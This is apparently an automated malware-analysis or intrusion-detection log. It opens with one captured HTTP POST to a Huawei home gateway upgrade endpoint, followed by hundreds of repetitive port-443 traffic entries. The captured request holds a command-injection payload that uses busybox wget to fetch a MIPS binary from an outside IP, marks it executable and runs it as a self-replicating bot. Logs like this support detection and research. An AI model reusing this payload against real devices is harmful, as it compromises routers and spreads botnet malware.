Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46356
Source: unknown	Network traffic detected: HTTP traffic on port 41058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33288
Source: unknown	Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34012
Source: unknown	Network traffic detected: HTTP traffic on port 47350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51708
Source: unknown	Network traffic detected: HTTP traffic on port 59608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50746
Source: unknown	Network traffic detected: HTTP traffic on port 33380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43192
Source: unknown	Network traffic detected: HTTP traffic on port 59690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36656
Source: unknown	Network traffic detected: HTTP traffic on port 40030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35692
Source: unknown	Network traffic detected: HTTP traffic on port 51708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 43950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51608
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44030
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35318
Source: unknown	Network traffic detected: HTTP traffic on port 55694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36888
Source: unknown	Network traffic detected: HTTP traffic on port 49658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33380
Source: unknown	Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59690
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45472
Source: unknown	Network traffic detected: HTTP traffic on port 53890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58006
Source: unknown	Network traffic detected: HTTP traffic on port 36978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38812
Source: unknown	Network traffic detected: HTTP traffic on port 35596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34462
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38816
Source: unknown	Network traffic detected: HTTP traffic on port 45306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60566
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50810
Source: unknown	Network traffic detected: HTTP traffic on port 50418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56118
Source: unknown	Network traffic detected: HTTP traffic on port 36656 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37320
Source: unknown	Network traffic detected: HTTP traffic on port 59596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38646
Source: unknown	Network traffic detected: HTTP traffic on port 50920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39618
Source: unknown	Network traffic detected: HTTP traffic on port 36290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60616
Source: unknown	Network traffic detected: HTTP traffic on port 48230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49658
Source: unknown	Network traffic detected: HTTP traffic on port 41598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45178
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47350
Source: unknown	Network traffic detected: HTTP traffic on port 47958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38636
Source: unknown	Network traffic detected: HTTP traffic on port 56134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56134
Source: unknown	Network traffic detected: HTTP traffic on port 46484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57220
Source: unknown	Network traffic detected: HTTP traffic on port 40086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47460
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37540
Source: unknown	Network traffic detected: HTTP traffic on port 34878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36446
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38628
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57350
Source: unknown	Network traffic detected: HTTP traffic on port 50970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38982
Source: unknown	Network traffic detected: HTTP traffic on port 56344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 53170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35596
Source: unknown	Network traffic detected: HTTP traffic on port 47026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60880
Source: unknown	Network traffic detected: HTTP traffic on port 38000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46236
Source: unknown	Network traffic detected: HTTP traffic on port 48140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36150
Source: unknown	Network traffic detected: HTTP traffic on port 39932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52632
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38328
Source: unknown	Network traffic detected: HTTP traffic on port 59720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59274
Source: unknown	Network traffic detected: HTTP traffic on port 41898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48486
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37590
Source: unknown	Network traffic detected: HTTP traffic on port 45452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51794
Source: unknown	Network traffic detected: HTTP traffic on port 40188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52400
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60024
Source: unknown	Network traffic detected: HTTP traffic on port 44504 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35290
Source: unknown	Network traffic detected: HTTP traffic on port 36832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57636 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47026
Source: unknown	Network traffic detected: HTTP traffic on port 51608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48110
Source: unknown	Network traffic detected: HTTP traffic on port 44108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38556
Source: unknown	Network traffic detected: HTTP traffic on port 41944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39636
Source: unknown	Network traffic detected: HTTP traffic on port 47862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60274
Source: unknown	Network traffic detected: HTTP traffic on port 56218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35282
Source: unknown	Network traffic detected: HTTP traffic on port 45142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62455
Source: unknown	Network traffic detected: HTTP traffic on port 56850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47372
Source: unknown	Network traffic detected: HTTP traffic on port 39954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55810
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53634
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39874
Source: unknown	Network traffic detected: HTTP traffic on port 45654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33098
Source: unknown	Network traffic detected: HTTP traffic on port 47840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41944
Source: unknown	Network traffic detected: HTTP traffic on port 40084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50418
Source: unknown	Network traffic detected: HTTP traffic on port 40258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 39618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37048
Source: unknown	Network traffic detected: HTTP traffic on port 41048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57296
Source: unknown	Network traffic detected: HTTP traffic on port 56894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 55616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38000
Source: unknown	Network traffic detected: HTTP traffic on port 54988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50420
Source: unknown	Network traffic detected: HTTP traffic on port 60616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59246
Source: unknown	Network traffic detected: HTTP traffic on port 47372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44910
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53946
Source: unknown	Network traffic detected: HTTP traffic on port 48486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39440
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50790
Source: unknown	Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39566
Source: unknown	Network traffic detected: HTTP traffic on port 39372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41992
Source: unknown	Network traffic detected: HTTP traffic on port 41202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49598
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48388
Source: unknown	Network traffic detected: HTTP traffic on port 55744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48144
Source: unknown	Network traffic detected: HTTP traffic on port 56766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48140
Source: unknown	Network traffic detected: HTTP traffic on port 55370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48260
Source: unknown	Network traffic detected: HTTP traffic on port 48722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60006
Source: unknown	Network traffic detected: HTTP traffic on port 55092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39022
Source: unknown	Network traffic detected: HTTP traffic on port 46236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53200
Source: unknown	Network traffic detected: HTTP traffic on port 42470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56956
Source: unknown	Network traffic detected: HTTP traffic on port 45804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34920
Source: unknown	Network traffic detected: HTTP traffic on port 47642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32990
Source: unknown	Network traffic detected: HTTP traffic on port 46374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51394
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43992
Source: unknown	Network traffic detected: HTTP traffic on port 50790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39372
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56608
Source: unknown	Network traffic detected: HTTP traffic on port 35968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52366
Source: unknown	Network traffic detected: HTTP traffic on port 38386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51032
Source: unknown	Network traffic detected: HTTP traffic on port 38982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52250
Source: unknown	Network traffic detected: HTTP traffic on port 43474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43624
Source: unknown	Network traffic detected: HTTP traffic on port 55606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55528
Source: unknown	Network traffic detected: HTTP traffic on port 49032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55886
Source: unknown	Network traffic detected: HTTP traffic on port 52042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42768
Source: unknown	Network traffic detected: HTTP traffic on port 33558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41792
Source: unknown	Network traffic detected: HTTP traffic on port 45530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43730
Source: unknown	Network traffic detected: HTTP traffic on port 43624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56624
Source: unknown	Network traffic detected: HTTP traffic on port 59820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown	Network traffic detected: HTTP traffic on port 35282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55410
Source: unknown	Network traffic detected: HTTP traffic on port 40370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42878
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40450
Source: unknown	Network traffic detected: HTTP traffic on port 36446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42470
Source: unknown	Network traffic detected: HTTP traffic on port 35692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53402
Source: unknown	Network traffic detected: HTTP traffic on port 47758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53890
Source: unknown	Network traffic detected: HTTP traffic on port 41074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44404
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45612
Source: unknown	Network traffic detected: HTTP traffic on port 37910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52322
